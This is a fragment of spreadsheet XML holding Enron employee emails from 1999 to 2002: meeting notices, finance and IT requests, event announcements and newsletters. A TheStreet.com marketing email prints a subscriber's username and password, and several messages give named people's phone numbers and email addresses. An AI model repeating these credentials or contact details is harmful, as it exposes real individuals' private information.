  </si>
  <si>
    <t>Sara,_x000D_
I sent the Schedule of Interest Rates to Glenn Divencenzo at JP Morgan with _x000D_
my comments after I spoke with him. _x000D_
He is following up with Legal on their side._x000D_
sg</t>
  </si>
  <si>
    <t>Mon, 28 Jan 2002 13:09:09 -0800 (PST)</t>
  </si>
  <si>
    <t>Lavo Mtg re Gas Traders</t>
  </si>
  <si>
    <t>=20_x000D_
_x000D_
--------- Inline attachment follows ---------_x000D_
_x000D_
From:  &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DKHILLIS&gt;_x000D_
To: Bass, Eric &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DEbass&gt;, Martin, Tho=_x000D_
mas A. &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DTmartin&gt;, Weldon, V. Charle=_x000D_
s &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DVweldon&gt;, Townsend, Judy &lt;/O=3DE=_x000D_
NRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DJtownse&gt;, Ring, Andrea &lt;/O=3DENRON/OU=3DN=_x000D_
A/CN=3DRECIPIENTS/CN=3DAring&gt;, Brawner, Sandra F. &lt;/O=3DENRON/OU=3DNA/CN=3D=_x000D_
RECIPIENTS/CN=3DSbrawne&gt;, Neal, Scott &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/C=_x000D_
N=3DSneal&gt;, Mckay, Jonathan &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DJmckay=_x000D_
1&gt;, Ames, Chuck &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DCames&gt;, Storey, Ge=_x000D_
off &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DGstorey&gt;, Williams, Jason (Tra=_x000D_
ding) &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DJwillia&gt;, Lewis, Andrew H. &lt;=_x000D_
/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DAlewis&gt;, Shively, Hunter S. &lt;/O=3DE=_x000D_
NRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DHshivel&gt;, Pimenov, Vladi &lt;/O=3DENRON/OU=_x000D_
=3DNA/CN=3DRECIPIENTS/CN=3DVPIMENOV&gt;, Mahmassani, Souad &lt;/O=3DENRON/OU=3DNA=_x000D_
/CN=3DRECIPIENTS/CN=3DSmahmass&gt;, Allen, Phillip K. &lt;/O=3DENRON/OU=3DNA/CN=_x000D_
=3DRECIPIENTS/CN=3DPallen&gt;, Tholt, Jane M. &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIE=_x000D_
NTS/CN=3DJtholt&gt;, Lenhart, Matthew &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=_x000D_
=3DMlenhar&gt;, Holst, Keith &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DKholst&gt;,=_x000D_
 Smith, Mathew &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DMsmith18&gt;, Heu, Mog=_x000D_
 &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DMheu&gt;, Grigsby, Mike &lt;/O=3DENRON/=_x000D_
OU=3DNA/CN=3DRECIPIENTS/CN=3DMgrigsb&gt;, South, Steven P. &lt;/O=3DENRON/OU=3DNA=_x000D_
/CN=3DRECIPIENTS/CN=3DSsouth&gt;, Ermis, Frank &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPI=_x000D_
ENTS/CN=3DFermis&gt;, Reitmeyer, Jay &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3D=_x000D_
Jreitme&gt;, Black, Don &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DDblack&gt;, Wolf=_x000D_
e, Jason &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DJwolfe&gt;, Griffith, John &lt;=_x000D_
/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DJgriffit&gt;, Zipper, Andy &lt;/O=3DENRON=_x000D_
/OU=3DNA/CN=3DRECIPIENTS/CN=3DAzipper&gt;, May, Larry &lt;/O=3DENRON/OU=3DNA/CN=_x000D_
=3DRECIPIENTS/CN=3DLmay2&gt;, Maggi, Mike &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/=_x000D_
CN=3DMmaggi&gt;, Quigley, Dutch &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DDquig=_x000D_
le&gt;, Lavorato, John &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DJLAVORA&gt;, Ligu=_x000D_
ms, Jeb &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DJligums&gt;, Yawapongsiri, Vi=_x000D_
rawan &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DVyawapon&gt;, Agarwalla, Dipak =_x000D_
&lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DDagarwal&gt;, Bayer, Adam &lt;/O=3DENRON=_x000D_
/OU=3DNA/CN=3DRECIPIENTS/CN=3DAbayer&gt;, Burk, Bart &lt;/O=3DENRON/OU=3DNA/CN=3D=_x000D_
RECIPIENTS/CN=3DBburk&gt;, Gaskill, Chris &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/=_x000D_
CN=3DCgaskill&gt;, Lieskovsky, Jozef &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3D=_x000D_
Jlieskov&gt;, O'Malley, Justin &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DJomall=_x000D_
ey&gt;, Pehlivanova, Biliana &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DBpehliva=_x000D_
&gt;, Tucker, Patrick &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DPtucker&gt;, McCar=_x000D_
roll, Zachary &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DZmccarr&gt;, Buss, Jd &lt;=_x000D_
/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DJeremy_buss&gt;_x000D_
CC: Rangel, Ina &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DIrangel&gt;, Vuittone=_x000D_
t, Laura &lt;/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DLvuitton&gt;, Young, Becky &lt;=_x000D_
/O=3DENRON/OU=3DNA/CN=3DRECIPIENTS/CN=3DByoung&gt;, Hogan, Irena D. &lt;/O=3DENRO=_x000D_
N/OU=3DNA/CN=3DRECIPIENTS/CN=3DIhogan&gt;_x000D_
Date: Monday, January 28, 2002 8:56:38 GMT_x000D_
Subject:=20_x000D_
_x000D_
Please join John Lavorato for a meeting regarding Gas Traders in ECS 06980 =_x000D_
(the large conference room) tomorrow, January 29 at 10:00 am._x000D_
_x000D_
Let me know if you have questions._x000D_
_x000D_
Kim_x000D_
x30681</t>
  </si>
  <si>
    <t>Wed, 6 Sep 2000 11:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'stephen.wolfe@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'ben.gwaltney@enron.com'})</t>
  </si>
  <si>
    <t>Check to be Reversed</t>
  </si>
  <si>
    <t xml:space="preserve">Ben,_x000D_
_x000D_
As per a voicemail I left you today, one of the Enron Global Markets Teams _x000D_
(Global Risk Markets) is awaiting the reversal of a check (to Goldman Sachs) _x000D_
that was wired out instead.  Kortney Brown and Dana Davis had worked with you _x000D_
and Lupy Spencer on this before.  Last anyone heard, it had made it to your _x000D_
desk._x000D_
_x000D_
I was checking to see if that was the case and if there would be any _x000D_
difficulty in voiding a legacy MSA check on the new SAP system.  Please let _x000D_
me know what you find or if you need any further information._x000D_
_x000D_
_x000D_
Stephen </t>
  </si>
  <si>
    <t>Tue, 22 May 2001 17:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">This request has been pending your approval for  45 days.  Please click _x000D_
http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000024686&amp;Page=_x000D_
Approval to review and act upon this request._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000024686_x000D_
Request Create Date : 3/21/01 8:04:40 AM_x000D_
Requested For       : juan.padron@enron.com_x000D_
Resource Name       : TradeWave NBPOWER_x000D_
Resource Type       : Applications_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Back Up Child Care Information Break Follow-Up</t>
  </si>
  <si>
    <t>Thank you for your interest in attending the July 19 Information Break on=_x000D_
=20_x000D_
"Back Up Child Care" for Enron employees. Due to the overwhelming response,=_x000D_
=20_x000D_
we have reached capacity in room 5C2 and can no longer accept RSVPs for thi=_x000D_
s=20_x000D_
event.=20_x000D_
_x000D_
The following activities are also designed to provide you with opportunitie=_x000D_
s=20_x000D_
to learn more about back up child care:_x000D_
_x000D_
 Information tables in the Enron Building Plaza  July 20-21, July 27-28 11:=_x000D_
00=20_x000D_
- 1:00=20_x000D_
 Open Houses at the Back up Child Care Center*  July 24-28  11:00 - 2:00_x000D_
_x000D_
*RSVPs are required. Please RSVP to Susan Bohannon at (281) 681-8317 or via=_x000D_
=20_x000D_
email at sbohannon@klcorp.com. Please bring picture identification (i.e.=20_x000D_
Enron ID or driver=01,s license).=20_x000D_
_x000D_
_x000D_
Feel free to contact Charla Stuart at (713) 853-6202 if you have any=20_x000D_
additional questions.=20_x000D_
=09</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 19:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>One Great Investment</t>
  </si>
  <si>
    <t>ONE FINAL CHANCE TO SAVE!!_x000D_
_x000D_
Dear Mark Taylor:_x000D_
_x000D_
You know by now that we at RealMoney.com know a lot about investing.  Well,_x000D_
here's an offer we think is a definite "buy"._x000D_
_x000D_
_x000D_
Just click on:_x000D_
_x000D_
http://www.thestreet.com/z/Sub_Center/subcenter.jhtml._x000D_
_x000D_
_x000D_
THIS IS YOUR LAST CHANCE TO SAVE $40 OFF A YEARLY SUBSCRIPTION!!!!!_x000D_
_x000D_
Take our reliable advice and save on the two things we all need more of:_x000D_
time and money. Invest in a one-year subscription to TheStreet.com! For_x000D_
only $199.95, you'll save nearly $40 off our monthly rate, and get 12_x000D_
months of all the real-time news and commentary you need to make sound_x000D_
investment decisions._x000D_
_x000D_
_x000D_
Username:  mtaylo1_x000D_
Password:  official109_x000D_
_x000D_
Get 24-hour, up-to-date news for only $199.95 a year, less than 60 cents a_x000D_
day! Sounds like a good investment to me.  Or, if you prefer, sign up_x000D_
for a monthly subscription at just $19.95 a month.  Either way, we hope_x000D_
we've convinced you to subscribe!_x000D_
_x000D_
_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Dave Kansas_x000D_
Editor-in-Chief_x000D_
_x000D_
P.S. You may also call Customer Service at 1-800-562-9571 to subscribe._x000D_
Hours of operation are ET 8 a.m. to 11 p.m., Monday - Friday, and 12 p.m._x000D_
to 6 p.m., Saturday and Sunday._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
TheStreet.com_x000D_
Ignore Us At Your Own Risk_x000D_
www.thestreet.com</t>
  </si>
  <si>
    <t>Fri, 8 Jun 2001 06:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeffrey.shankman@enron.com', 'jeffrey.mcmahon@enron.com', 'kevin.garland@enron.com', 'keith.dodson@enron.com', 'john.lavorato@enron.com', 'brian.stanley@enron.com', 'mike.mcconnell@enron.com', 'james.hughes@enron.com', 'rebecca.mcdonald@enron.com'})</t>
  </si>
  <si>
    <t>Diamond Level Astros Tickets Available</t>
  </si>
  <si>
    <t>Greg Whalley's four diamond level Astros tickets, plus parking pass, are _x000D_
available for the games listed below.  Please advise me, asap,  if you have _x000D_
an interest.  _x000D_
_x000D_
Many Thanks,_x000D_
_x000D_
Liz Taylor x31935_x000D_
_x000D_
COL  Wednesday, June 20 @ 7:05 p.m._x000D_
CIN  Thursday, June 21 @ 7:05 p.m.</t>
  </si>
  <si>
    <t>Wed, 3 Jan 2001 02:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Global Facilites - Maintenace Request - Completed - Request ID:_x000D_
 02177</t>
  </si>
  <si>
    <t xml:space="preserve">Just great.  You are the one setting up my facilities???  Just great._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Marlene Hilliard_x000D_
01/03/2001 10:06 AM_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Global Facilites - Maintenace Request - Completed - Request ID: 02177_x000D_
_x000D_
_x000D_
The following Maintenance Request has been completed:_x000D_
_x000D_
Click on this link to view document --&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Sep 2000 02:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>I have not received a call back from Jeff Bartlett, but based on the brochure _x000D_
I received from Louise, here is what I understand:_x000D_
_x000D_
DealBench is a way to streamline processes to efficiently execute _x000D_
transactions and distribute deal-related information.  There are 5 platform _x000D_
tools - document sharing, multi-media, auctioning, secure communication, and _x000D_
deal management.   There are five primary products offered which utilize the _x000D_
tools provided...  Bank Products, Structured Products, Commercial Paper, _x000D_
Procurement, and Legal Space. _x000D_
_x000D_
1) Bank Products - deal management for issuance of debt offerings (credit _x000D_
revolvers/secured term-notes) _x000D_
2) Structured Products - deal management for initial issuance or re-sale of _x000D_
bonds, leveraged leases and other financial transactions_x000D_
3)  Commercial Paper - deal mgmt for issuance of CP_x000D_
4)  Procurement - management of wholesale purchasing and selling of various _x000D_
products_x000D_
5)  Legal Space - designed to meet the needs of attorneys at law firms (doc _x000D_
sharing, aggregation and organization in a secure environment)_x000D_
_x000D_
I have a lot of questions for Jeff, so I will send you a quick note when I _x000D_
speak to him._x000D_
_x000D_
Sheri</t>
  </si>
  <si>
    <t>Wed, 8 Sep 1999 05:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'marie.heard@enron.com', 'tana.jones@enron.com', 'shari.stack@enron.com', 'carol.clair@enron.com', 'susan.flynn@enron.com', 'susan.bailey@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Legal/Confirm Desk Lunch</t>
  </si>
  <si>
    <t>Mark your calendars for Wednesday, September 15.  Details to follow.</t>
  </si>
  <si>
    <t>Tue, 22 May 2001 05:19:31 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Crestar</t>
  </si>
  <si>
    <t>Yes, your correct, I'm sure that we are going to have the same issue.  I'm still waiting for the lawyer to respond back to me.  I know he had to contact the Calgary trader to get a resolution.  I'll contact him again today and will let you know what he says.  Thanks for reminding me again!_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Dozier, Scott  _x000D_
Sent:	Tuesday, May 22, 2001 6:57 AM_x000D_
To:	Mims, Patrice L._x000D_
Subject:	Re: Crestar_x000D_
_x000D_
Just wanted to keep on top of this..._x000D_
_x000D_
We are getting ready to settle Apr-01 production and I believe that we might have the same issue._x000D_
_x000D_
Scott_x000D_
5-7213_x000D_
---------------------- Forwarded by Scott Dozier/NA/Enron on 05/22/2001 06:55 AM ---------------------------_x000D_
   _x000D_
_x000D_
 	Enron North America Corp.  From:  Scott Dozier                           05/17/2001 12:15 PM	_x000D_
		_x000D_
_x000D_
_x000D_
To:	Patrice L Mims/ENRON@enronXgate_x000D_
cc:	 _x000D_
_x000D_
Subject:	Re: Crestar   &lt;&lt; OLE Object: StdOleLink &gt;&gt; _x000D_
_x000D_
Patrice - Any word on this?_x000D_
_x000D_
_x000D_
From:	Patrice L Mims/ENRON@enronXgate on 05/14/2001 07:39 AM_x000D_
To:	Scott Dozier/NA/Enron@Enron_x000D_
cc:	 _x000D_
_x000D_
Subject:	Crestar_x000D_
_x000D_
Hi Scott,_x000D_
_x000D_
I'm still tracking down the Crestar issue, but at this time, it appears as though we should not have changed the name to Gulf Canada until recently when the sharing mechanism came into play with BP for the AOS.  Crestar confirmed this and Dan Hyval left me a voice mail alluding to thus, but I need to hear back from him to ask that direct question.  I'll be back in touch, hopefully this afternoon._x000D_
_x000D_
Thanks_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&lt;Embedded Picture (Device Independent Bitmap)&gt;</t>
  </si>
  <si>
    <t>Mon, 28 Aug 2000 11:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>ERMS Resources</t>
  </si>
  <si>
    <t xml:space="preserve">Please set up a meeting with Steve and Beth as soon as we can.  I believe _x000D_
that Beth is out sick at the present.  _x000D_
---------------------- Forwarded by Sally Beck/HOU/ECT on 08/28/2000 06:48 PM _x000D_
---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Sally Beck                           08/28/2000 06:48 PM_x000D_
	_x000D_
_x000D_
To: Stephen Stock/HOU/ECT@ECT, Beth Perlman/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: ERMS Resources_x000D_
_x000D_
I heard today that Curtis Smith has resigned.  I am sure that both ot you _x000D_
know that Curtis and Jeremy Wong were viewed by users as critical resources _x000D_
for ERMS support.  Even at a stand still, my team had great concern over the _x000D_
rumored loss of Curtis and/or Jeremy.  And with the assumption that Sitara _x000D_
will not go forward for valuation, then ERMS really has become repositioned _x000D_
as one of our key, strategic systems.  There is much to do to "catch up", if _x000D_
you will, with changes and enhancements that were put on hold for several _x000D_
years during the Sitara development stage.  And our business continues to _x000D_
grow and change rapidly, requiring responsive enhancements on an on-going _x000D_
basis.   _x000D_
_x000D_
I would like to get together to discuss the staffing plan for support of ERMS _x000D_
as soon as possible.   We need to understand how day-to-day production _x000D_
support will be managed and how development work will be effectively _x000D_
handled.  _x000D_
_x000D_
I will ask my assistant to set up a meeting as soon as possible.  _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 20 Oct 2000 12:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FoolWatch: Roadmap to Retirement</t>
  </si>
  <si>
    <t>__________________________________________________________________x000D_
_x000D_
                        F O O L W A T C H_x000D_
                    Friday, October 20, 2000_x000D_
_x000D_
benjamin.rogers@enron.com_x000D_
__________________________________________________________________x000D_
_x000D_
REGISTER TO BECOME A FOOL -- GET FREE STUFF!_x000D_
http://www.fool.com/m.asp?i=163871_x000D_
__________________________________________________________________x000D_
_x000D_
                        Close    Change   %Change_x000D_
_x000D_
            NOW 50    1,837.05   +10.93   +0.60%_x000D_
            DJIA     10,226.59   +83.61   +0.82%_x000D_
            S&amp;P 500   1,396.92    +8.16   +0.59%_x000D_
            NASDAQ    3,483.14   +64.54   +1.89%_x000D_
            (Numbers as of 5:00 p.m. ET)_x000D_
_x000D_
_x000D_
 SPONSORED BY: American Express_x000D_
 Why invest with American Express? Exceptional financial_x000D_
 planning tools, round-the-clock customer service and_x000D_
 low commission trading. Trade online with a company_x000D_
 you know and trust!_x000D_
      http://www.lnksrv.com/m.asp?i=163872_x000D_
_x000D_
_x000D_
SEMINAR PREVIEW: ROADMAP TO RETIREMENT_x000D_
  Here at the Fool, we tell you to buy great companies and hold_x000D_
  them. But, does there ever come a time when you get to coast_x000D_
  and cash in the pot of gold?_x000D_
http://www.fool.com/m.asp?i=163873_x000D_
_x000D_
FOOL ON THE HILL: COPPER MOUNTAIN LOW_x000D_
  When The Motley Fool interviewed Copper Mountain's CEO_x000D_
  recently, he didn't mention an impending earnings warning._x000D_
http://www.fool.com/m.asp?i=163874_x000D_
_x000D_
Rule Maker: Unanswered Questions at Microsoft_x000D_
  One Fool isn't sure what to make of Microsoft's Internet_x000D_
  strategy or Linux's threat._x000D_
http://www.fool.com/m.asp?i=163875_x000D_
_x000D_
NEWS: EBAY RECORDS STELLAR Q3_x000D_
  Third-quarter results show eBay is progressing toward its goal_x000D_
  of becoming "the world's largest trading platform."_x000D_
http://www.fool.com/m.asp?i=163876_x000D_
_x000D_
THE WEEK IN REVIEW: YOUR EYE ON THE HORIZON_x000D_
  Jerry Thomas finds a silver lining in the recent Wall Street_x000D_
  cloud. Maybe even for Priceline.com._x000D_
http://www.fool.com/m.asp?i=163877_x000D_
_x000D_
FOOL RADIO: Q3 EARNINGS REPORTS AND LARRY MCCLOSKEY_x000D_
  Join Tom and David Gardner as they tackle the market's recent_x000D_
  volatility and talk IBM._x000D_
http://www.fool.com/m.asp?i=163878_x000D_
_x000D_
NEWS: COKE NEEDS TO SPARKLE, NOT PERFORM_x000D_
  Investors can see higher case volume sales and gallon shipments_x000D_
  at Coke, but can the company live up to its steep share price_x000D_
  and premier name?_x000D_
http://www.fool.com/m.asp?i=163879_x000D_
_x000D_
RULE BREAKER: INVESTING FOR PEACE OF MIND_x000D_
  After last week's crazy market, this Fool is looking for_x000D_
  spiritual, rather than financial, guidance._x000D_
http://www.fool.com/m.asp?i=163880_x000D_
_x000D_
FOOL PLATE SPECIAL: RESEARCH IN MOTION SICKNESS?_x000D_
  The company that brings you the super-cool Blackberry wireless_x000D_
  action is cooler than homemade jam, but it has a slim margin_x000D_
  for error._x000D_
http://www.fool.com/m.asp?i=163881_x000D_
_x000D_
FOOLISH FOUR: SAVING FOR RETIREMENT_x000D_
  Time is the most important factor in investing success. Putting_x000D_
  off planning for your retirement costs far more than you think._x000D_
http://www.fool.com/m.asp?i=163882_x000D_
_x000D_
TAXES: DEDUCTIONS FOR HOME COMPUTERS_x000D_
  Roy Lewis provides qualifications and guidelines for taking tax_x000D_
  deductions for a home computer._x000D_
http://www.fool.com/m.asp?i=163883_x000D_
_x000D_
NEWS: ERICSSON -- LOSING THE MOBILE PHONE RACE_x000D_
  Ericsson announced earnings yesterday: Super infrastructure_x000D_
  revenues, miserable mobile phone ones._x000D_
http://www.fool.com/m.asp?i=163884_x000D_
_x000D_
HOT TOPICS_x000D_
  What Fools are talking about: Nokia's last quarter, Apple's_x000D_
  sour taste, and more._x000D_
http://www.fool.com/m.asp?i=163885_x000D_
_x000D_
BREAKFAST WITH THE FOOL: COMMERCE ONE REPORTS Q3_x000D_
  Internet B2B company Commerce One posted solid Q3 results after_x000D_
  the market's close yesterday._x000D_
http://www.fool.com/m.asp?i=163886_x000D_
_x000D_
FRIBBLE: THE INVESTING MARATHON IS ON_x000D_
  This Fool pulled himself out of debt with a lot of work and_x000D_
  determination and is now a Foolish investor._x000D_
http://www.fool.com/m.asp?i=163887_x000D_
_x000D_
__________________________________________________________________x000D_
_x000D_
My Portfolio: http://www.fool.com/m.asp?i=163888_x000D_
My Discussion Boards: http://www.fool.com/m.asp?i=163889_x000D_
My Fool: http://www.fool.com/m.asp?i=163890_x000D_
Fool.com Home: http://www.fool.com/m.asp?i=163891_x000D_
My E-Mail Settings: http://www.fool.com/m.asp?i=163892_x000D_
_x000D_
_x000D_
 SPONSORED BY: American Express_x000D_
 Why invest with American Express? Exceptional financial_x000D_
 planning tools, round-the-clock customer service and_x000D_
 low commission trading. Trade online with a company_x000D_
 you know and trust!_x000D_
      http://www.lnksrv.com/m.asp?i=163893_x000D_
_x000D_
_x000D_
WANT TO RETIRE EARLY?_x000D_
 We'll help you set your retirement_x000D_
 date (literally!) in our Roadmap to_x000D_
 Retirement Online Seminar._x000D_
http://www.fool.com/m.asp?i=163894_x000D_
_x000D_
WIRELESS 201: NOKIA, QUALCOMM AND MORE_x000D_
 Check out the sequel to the_x000D_
 best-selling "Wireless 101" on Soapbox.com_x000D_
http://www.lnksrv.com/m.asp?i=163895_x000D_
_x000D_
FOOL DIRECT E-MAIL SERVICES_x000D_
 Need to change your address or unsubscribe? You_x000D_
 can also temporarily suspend mail delivery._x000D_
http://www.fool.com/community/freemail/freemaillogin.asp?email=benjamin.rogers_x000D_
@enron.com_x000D_
_x000D_
 Have ideas about how we can improve the Fool Direct or new_x000D_
 e-mail products you'd like to see? Try our discussion board:_x000D_
http://www.fool.com/m.asp?i=163896_x000D_
_x000D_
__________________________________________________________________x000D_
(c) Copyright 2000, The Motley Fool. All rights reserved. This_x000D_
material is for personal use only. Republication and_x000D_
redissemination, including posting to news groups, is expressly_x000D_
prohibited without the prior written consent of The Motley Fool._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
MsgId: msg-10188-B10204010Address.msg-18:48:17(10-20-2000)_x000D_
X-Version: mailer-sender-master,v 1.84_x000D_
X-Version: mailer-sender-daemon,v 1.84_x000D_
Message-Recipient: benjamin.rogers@enron.com</t>
  </si>
  <si>
    <t>Tue, 23 Jan 2001 07:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>503119_x000D_
broker has us selling</t>
  </si>
  <si>
    <t>Fri, 22 Sep 2000 07:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Softball info</t>
  </si>
  <si>
    <t>lisa gillette_x000D_
kendra something_x000D_
bryan hull</t>
  </si>
  <si>
    <t>Thu, 22 Feb 2001 13:18:07 -0800 (PST)</t>
  </si>
  <si>
    <t>EOL Invoice for set up of Brazil</t>
  </si>
  <si>
    <t xml:space="preserve">Thought you might like to see Remi's note, below._x000D_
_x000D_
Dave_x000D_
---------------------- Forwarded by David Forster/Corp/Enron on 02/22/2001 03:17 PM ---------------------------_x000D_
_x000D_
_x000D_
Remi Collonges_x000D_
02/22/2001 03:05 PM_x000D_
To:	Allen W Ueckert/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:	Patrick Hansen/SA/Enron@Enron, David Forster/Corp/Enron@Enron, Justin Rostant/HOU/ECT@ECT, Carlos Alatorre/NA/Enron@Enron, Ricardo Lisboa/SA/Enron@Enron  _x000D_
_x000D_
Subject:	EOL Invoice for set up of Brazil_x000D_
_x000D_
Allen,_x000D_
_x000D_
Kish approved this invoice.  Can you do the accounting transfer to Networks, please?_x000D_
_x000D_
Many thanks,_x000D_
_x000D_
Remi_x000D_
_x000D_
---------------------- Forwarded by Remi Collonges/SA/Enron on 02/22/2001 06:04 PM ---------------------------_x000D_
From:	Kristin Armstrong/ENRON@enronXgate on 02/22/2001 02:38 PM CST_x000D_
To:	Patrick Hansen/SA/Enron@Enron_x000D_
cc:	David Forster/Corp/Enron@Enron, Justin Rostant/HOU/ECT@ECT, Carlos Alatorre/NA/Enron@Enron, Remi Collonges/SA/Enron@Enron, Ricardo Lisboa/SA/Enron@Enron _x000D_
Subject:	EOL Invoice for set up of Brazil_x000D_
_x000D_
Patrick - please see attached for copy of invoice for initial set up of Brazil on EOL.  Please call with any questions._x000D_
 _x000D_
Thanks,_x000D_
Kris_x000D_
x3-1927_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 28 Jul 2000 01:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>letter of 7/17/00 re: data center operations</t>
  </si>
  <si>
    <t xml:space="preserve">PB,_x000D_
FYI, please make sure someone takes a look at this and atleast provides a _x000D_
response._x000D_
_x000D_
Thanks,_x000D_
mike _x000D_
---------------------- Forwarded by Mike McConnell/HOU/ECT on 07/28/2000 _x000D_
08:10 AM ---------------------------_x000D_
_x000D_
_x000D_
"Wilson, Terryl" &lt;terryl.wilson@us.origin-it.com&gt; on 07/26/2000 05:01:36 PM_x000D_
To: "'mike.mcconnell@enron.com'" &lt;mike.mcconnell@enron.com&gt;, _x000D_
"'cathy.phillips@enron.com'" &lt;cathy.phillips@enron.com&gt;_x000D_
cc:  _x000D_
Subject: letter of 7/17/00 re: data center operations_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 &lt;&lt;ltrhd enron 7.17.doc&gt;&gt; _x000D_
_x000D_
This letter was also sent to Mr. Fastow on 7/12/00. _x000D_
_x000D_
I look forward to talking to you. _x000D_
_x000D_
Regards _x000D_
_x000D_
Terryl _x000D_
_x000D_
terryl.wilson@us.origin-it.com _x000D_
TEL?????? 972.861.1955 _x000D_
CELL??? 214.335.9146 _x000D_
FAX????? 972.387.1896 _x000D_
_x000D_
 - ltrhd enron 7.17.doc_x000D_
</t>
  </si>
  <si>
    <t>Sun, 4 Feb 2001 02:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'spiller@haas.berkeley.edu'})</t>
  </si>
  <si>
    <t>SF Chronicle</t>
  </si>
  <si>
    <t>David:  The chronicle has a very hard hitting report on the crisis on its_x000D_
first page today.  some reporters learn something._x000D_
we get some billing as well._x000D_
_x000D_
See_x000D_
http://www.sfgate.com/cgi-bin/article.cgi?f=/chronicle/archive/2001/02/04/MN_x000D_
184122.DTL</t>
  </si>
  <si>
    <t>Thu, 23 Mar 2000 08:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>GCA Amend.</t>
  </si>
  <si>
    <t xml:space="preserve">Please review the attached.  I am still waiting on an answer from Davis _x000D_
concerning Section 3.2.  It may need to be tweaked a little more._x000D_
</t>
  </si>
  <si>
    <t>Wed, 5 Dec 2001 12:06:04 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jkjstegall@aol.com'})</t>
  </si>
  <si>
    <t>RE: FW: Fw: Signs that you've grown up.</t>
  </si>
  <si>
    <t xml:space="preserve">Those are funny.  Work is hectic, can't write much, but hope to find a time that you can come visit._x000D_
_x000D_
Stacey_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Jkjstegall@aol.com@ENRON  _x000D_
Sent:	Wednesday, December 05, 2001 2:00 PM_x000D_
